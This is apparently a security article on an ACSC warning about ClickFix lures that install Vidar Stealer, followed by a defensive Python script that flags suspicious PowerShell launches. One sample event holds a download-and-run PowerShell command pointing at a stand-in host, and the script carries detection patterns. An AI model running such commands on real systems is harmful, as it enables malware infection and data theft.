Vidar Stealer Surges: How ClickFix Social Engineering Targets Australian Networks
The Australian Cyber Security Centre (ACSC) has issued a fresh warning to organizations about an active malware campaign that leverages the ClickFix social engineering technique to deploy Vidar Stealer, a sophisticated information-stealing malware. This campaign poses a significant threat to businesses and government agencies across Australia, with the potential to compromise sensitive data, financial accounts, and credentials.
Campaign Overview
The ACSC first detected the uptick in activity in late 2024 and continues to monitor the threat. Attackers are using the ClickFix method to trick users into running malicious commands that install Vidar Stealer on Windows systems. The malware is disguised as a troubleshooting tool or a browser update, luring victims with fake error messages that prompt immediate action.

What Is ClickFix?
ClickFix is a social engineering technique that presents users with a fake error notification or warning, often mimicking legitimate software alerts. The error message instructs the user to press a key combination (such as Windows + R) or click a button to "fix" the issue. Once the victim follows the instructions, they inadvertently execute a malicious script that downloads and runs the Vidar Stealer payload.
This technique exploits the user's trust in system alerts and their urgency to resolve perceived problems. Unlike traditional phishing that relies on email links or attachments, ClickFix operates entirely within the current browser session, making it harder for many security tools to detect.
Vidar Stealer Capabilities
Vidar Stealer is a commodity infostealer sold on underground forums and commonly used in targeted and opportunistic attacks. Once installed, it performs the following actions:
- Credential theft: Extracts saved passwords from browsers, email clients, and FTP applications.
- Cryptocurrency wallet harvesting: Identifies and exfiltrates wallet files and private keys from popular wallets like Bitcoin Core, Electrum, and Exodus.
- Session hijacking: Steals cookies and session tokens to bypass multi-factor authentication.
- Screenshot capture: Takes screenshots of the active desktop to steal visible data.
- Data exfiltration: Compresses stolen data and sends it to command-and-control (C2) servers.
Data Targeted in This Campaign
According to the ACSC, the current Vidar variant specifically targets browser-stored credentials, autofill data, and cryptocurrency wallet information. Attackers also harvest system information, including computer name, installed software, and user locale, to tailor further attacks. The stolen data is often sold on dark web markets or used for account takeover and financial fraud.
Infection Chain: How the Attack Unfolds
The attack begins with a compromised website or a malvertising campaign. When a user visits the infected site, they see a pop-up resembling a legitimate browser error or a notification that says "Your browser is out of date" or "Hardware failure detected."

- The pop-up instructs the victim to copy a PowerShell command or press a specific key sequence.
- If the user follows the instruction, they run a script that downloads the Vidar Stealer executable from a remote server.
- The executable runs silently, often bypassing User Account Control (UAC) prompts by using signed binaries or DLL sideloading.
- Vidar collects data and sends it to a C2 server controlled by the threat actor.
The entire process can occur in seconds, with no further user interaction required after the initial click. Because the script is run from the clipboard or a keyboard shortcut, traditional scanning tools that monitor file downloads may not flag it.
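The chain above leaves a recognisable footprint in process-creation telemetry: a script host started from the Run dialog (so its parent is explorer.exe) with a command line that hides its window, fetches content from the web and pipes it to Invoke-Expression. The following added example, not from the ACSC advisory, scores constructed Sysmon-style records against those indicators and flags only the combination, so an administrator running a local script from Win+R is not flagged on the parent process alone; the event fields, weights and threshold are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr http://fix.example/verify.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -enc QUJDREVGR0hJSktMTU5P"},  # placeholder argument, not a payload
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# (name, weight, compiled regex) applied to the lower-cased command line; weights are assumed.
CMDLINE_INDICATORS: List[Tuple[str, int, re.Pattern]] = [
    ("hidden_window", 2, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b")),
    ("policy_bypass", 1, re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass")),
    ("encoded_command", 2, re.compile(r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{8,}")),
    ("download_cmdlet", 2, re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient|curl|wget)\b")),
    ("invoke_expression", 2, re.compile(r"\b(?:iex|invoke-expression)\b")),
]

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, matched indicator names) for one process-creation record."""
    score, hits = 0, []
    if _basename(event.get("Image", "")) in SCRIPT_HOSTS:
        score, hits = score + 1, hits + ["script_host"]
    # Win+R / Run-dialog launches appear as children of explorer.exe, which is the ClickFix path.
    if _basename(event.get("ParentImage", "")) == "explorer.exe":
        score, hits = score + 2, hits + ["explorer_parent"]
    cmd = event.get("CommandLine", "").lower()
    for name, weight, pattern in CMDLINE_INDICATORS:
        if pattern.search(cmd):
            score, hits = score + weight, hits + [name]
    return score, hits

def find_clickfix_candidates(events, threshold: int = 5) -> List[Dict]:
    """Flag records whose combined indicator score reaches the threshold."""
    out = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            out.append({"CommandLine": ev["CommandLine"], "score": score, "indicators": hits})
    return out

if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit)
```

Only the first record is flagged; the legitimate Run-dialog script and the service-launched encoded command each stay below the threshold, which is the point of scoring the combination rather than any single indicator.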
ACSC Recommendations for Organizations
The ACSC has provided several practical steps to mitigate the risk of ClickFix attacks and Vidar Stealer infections:
- Restrict PowerShell usage: Implement Group Policy to block PowerShell execution for non-administrative users or enable constrained language mode.
- Enable application whitelisting: Use tools like Microsoft AppLocker or Windows Defender Application Control to prevent unauthorized executables.
- Educate users: Train staff to recognize fake error messages and to never run commands from pop-ups or untrusted sources.
- Deploy endpoint detection and response (EDR): Use EDR solutions that can monitor for suspicious script execution and process injection.
- Update software: Keep browsers and operating systems patched to close vulnerabilities that may be exploited to serve malicious pop-ups.
- Implement network segmentation: Limit the lateral movement of malware by isolating critical systems from user workstations.
Conclusion
The ClickFix campaign distributing Vidar Stealer is a clear example of how social engineering continues to evolve, even as technical defenses improve. Organizations in Australia and elsewhere must remain vigilant, particularly when it comes to user behavior and script execution policies. The ACSC will continue to update its advisories as new information emerges. Immediate implementation of the recommended controls can significantly reduce the risk of data breach and financial loss.